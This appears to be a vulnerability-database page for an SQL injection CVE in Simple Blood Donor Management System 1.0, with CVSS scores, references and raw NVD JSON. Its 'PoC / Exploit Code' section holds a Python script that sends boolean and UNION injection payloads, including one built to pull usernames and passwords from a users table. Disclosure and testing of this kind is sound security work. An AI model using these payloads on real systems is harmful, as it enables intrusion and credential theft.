CVE-2025-14961

Description

A vulnerability was detected in code-projects Simple Blood Donor Management System 1.0. The affected element is an unknown function of the file /editedcampaign.php. The manipulation of the argument campaignname results in sql injection. The attack can be executed remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:simple_blood_donor_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Simple Blood Donor Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14961 SQL Injection PoC
# Target: Simple Blood Donor Management System 1.0
# File: /editedcampaign.php
# Parameter: campaignname

import requests
import sys

target_url = "http://target-site.com/editedcampaign.php"

# Basic SQL Injection PoC - Boolean Based
payload_blind = "' OR 1=1 ---"
payload_union = "' UNION SELECT NULL,NULL,version() ---"

def test_blind_injection(url, param_name):
    """Test for boolean-based blind SQL injection"""
    data = {param_name: payload_blind}
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Potential SQL injection detected with payload: {payload_blind}")
            return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

def test_union_injection(url, param_name):
    """Test for UNION-based SQL injection to extract data"""
    data = {param_name: payload_union}
    try:
        response = requests.post(url, data=data, timeout=10)
        if '5.' in response.text or 'MariaDB' in response.text:
            print(f"[+] Database version exposed via UNION injection")
            return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

def extract_data(url, param_name):
    """Extract sensitive data using UNION injection"""
    # Extract database name
    payload_db = "' UNION SELECT NULL,database() ---"
    # Extract users table data
    payload_users = "' UNION SELECT NULL,CONCAT(username,':',password) FROM users ---"
    print("[*] Extracting database information...")
    # Additional exploitation steps would go here

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    print(f"[*] Testing target: {target_url}")
    test_blind_injection(target_url, "campaignname")
    test_union_injection(target_url, "campaignname")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14961
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14961
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14961/
[4] VulDB https://vuldb.com/cve/CVE-2025-14961
[5] https://code-projects.org/
[6] https://github.com/lei-loveling/CVE/issues/2
[7] https://vuldb.com/?ctiid.337597
[8] https://vuldb.com/?id.337597
[9] https://vuldb.com/?submit.717584

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14961", "sourceIdentifier": "[email protected]", "published": "2025-12-19T19:15:49.820", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in code-projects Simple Blood Donor Management System 1.0. The affected element is an unknown function of the file /editedcampaign.php. The manipulation of the argument campaignname results in sql injection. The attack can be executed remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:simple_blood_donor_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "75613ECC-3DE5-4D47-9A97-BCD7E52D3824"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lei-loveling/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.337597", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337597", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.717584", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}